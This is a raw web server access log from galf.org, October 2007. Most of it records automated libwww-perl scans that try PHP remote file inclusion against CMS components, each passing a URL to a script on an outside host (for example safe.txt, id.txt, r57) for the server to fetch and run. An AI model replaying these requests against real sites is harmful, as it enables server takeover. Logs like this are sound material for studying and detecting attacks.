208.113.151.18 - - [07/Oct/2007:18:01:22 -0700] "GET /index.php?pag=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:18:01:44 -0700] "GET /logs/access.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:04:30 -0700] "GET /logs/access_070806.log//index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:04:30 -0700] "GET //index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:04:30 -0700] "GET /logs//index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:04:43 -0700] "GET /logs/access_070806.log//index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:04:43 -0700] "GET //index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:04:43 -0700] "GET /logs//index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:06:15 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:06:17 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:06:18 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.239.140.2 - - [07/Oct/2007:18:06:35 -0700] "GET /logs/access_070618.log//public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:06:43 -0700] "GET /logs/access_070730.log//index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [07/Oct/2007:18:06:43 -0700] "GET /logs/access_070730.log//index.php?x=http://www.sunnfjordkajakk.org/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:06:47 -0700] "GET /logs/access.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:06:50 -0700] "GET /logs/access_070910.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:18:09:39 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:18:09:39 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:09:44 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:18:09:54 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:18:09:55 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:10:10 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:10:10 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:10:11 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.92.150.63 - - [07/Oct/2007:18:10:33 -0700] "GET /index.php?dir=http://www.bwa-handball.de/cms/images/stories/cmd22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:18:11:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:18:11:02 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.28.21 - - [07/Oct/2007:18:11:21 -0700] "GET /logs/index.php?configFile=http://www.bymalaca.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "galf.org"
200.168.28.21 - - [07/Oct/2007:18:11:22 -0700] "GET /index.php?configFile=http://www.bymalaca.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "galf.org"
72.37.212.106 - - [07/Oct/2007:18:12:24 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:12:31 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.234.8.179 - - [07/Oct/2007:18:13:11 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:13:29 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:13:29 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:13:30 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:13:33 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:13:33 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:18:13:49 -0700] "GET /logs/announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:18:13:49 -0700] "GET /announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:13:51 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:14:25 -0700] "GET /logs/access.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:18:15:56 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:18:16:02 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:16:26 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 2659344 "http://www.google.it/search?q=c99.php+netsons&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:it:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:16:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:16:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:16:55 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:16:55 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:18:17:00 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.42.129 - - [07/Oct/2007:18:17:00 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.42.129 - - [07/Oct/2007:18:17:00 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.57.189.226 - - [07/Oct/2007:18:17:05 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:18:17:07 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.57.189.226 - - [07/Oct/2007:18:17:10 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:39 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:47 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:49 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:51 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:53 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:55 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:57 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/tmp/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:18:58 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:19:07 -0700] "GET /logs/scripts.log HTTP/1.1" 200 126438 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
85.18.136.94 - - [07/Oct/2007:18:19:54 -0700] "GET /logs/access_071008.log HTTP/1.1" 200 983040 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:18:19:55 -0700] "GET /logs/access_070910.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:18:19:55 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:18:19:55 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
24.39.209.148 - - [07/Oct/2007:18:21:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.catim.com/legislacao/suntik/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
24.39.209.148 - - [07/Oct/2007:18:21:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.catim.com/legislacao/suntik/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:22:14 -0700] "GET /logs/access.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:22:39 -0700] "GET /logs/access_070827.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:22:39 -0700] "GET /logs/access_070827.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:22:40 -0700] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:23:05 -0700] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:23:05 -0700] "GET /logs/access_070910.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:23:05 -0700] "GET /logs/access_070910.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:23:38 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:23:38 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.234.8.179 - - [07/Oct/2007:18:23:55 -0700] "GET /logs/access_070625.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.234.8.179 - - [07/Oct/2007:18:23:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:18:24:10 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:18:24:10 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.239.140.2 - - [07/Oct/2007:18:24:18 -0700] "GET /logs/access_070910.log//public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.143.140.153 - - [07/Oct/2007:18:24:55 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
202.143.140.153 - - [07/Oct/2007:18:24:56 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
202.143.140.153 - - [07/Oct/2007:18:24:57 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.53" "galf.org"
202.143.140.153 - - [07/Oct/2007:18:24:58 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.53" "galf.org"
195.3.85.33 - - [07/Oct/2007:18:25:05 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.26.100 - - [07/Oct/2007:18:25:39 -0700] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:26:04 -0700] "GET /logs/access_070827.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:26:05 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:26:05 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.22.44.42 - - [07/Oct/2007:18:26:26 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.143.140.153 - - [07/Oct/2007:18:26:26 -0700] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:18:26:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:18:26:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:27:30 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:18:28:36 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:28:40 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:18:28:48 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:28:57 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:28:57 -0700] "GET /spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:28:58 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:29:18 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.239.167.90 - - [07/Oct/2007:18:31:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.coverbands.info/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
204.239.167.90 - - [07/Oct/2007:18:31:38 -0700] "GET //skin/zero_vote/error.php?dir=http://www.coverbands.info/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.2.212.50 - - [07/Oct/2007:18:33:48 -0700] "GET /index.php?dir=http://www.bwa-handball.de/cms/images/stories/cmd22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:18:35:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:18:35:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:18:36:41 -0700] "GET /logs/access_070910.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.42.129 - - [07/Oct/2007:18:36:41 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:18:36:42 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:37:00 -0700] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
211.108.60.242 - - [07/Oct/2007:18:37:01 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:37:01 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.22.44.42 - - [07/Oct/2007:18:39:59 -0700] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.22.44.42 - - [07/Oct/2007:18:39:59 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.72.112.158 - - [07/Oct/2007:18:40:25 -0700] "GET /logs/index.php?inc=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
64.72.112.158 - - [07/Oct/2007:18:40:25 -0700] "GET /index.php?inc=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:18:40:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:18:40:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
74.124.198.61 - - [07/Oct/2007:18:41:51 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:18:42:02 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
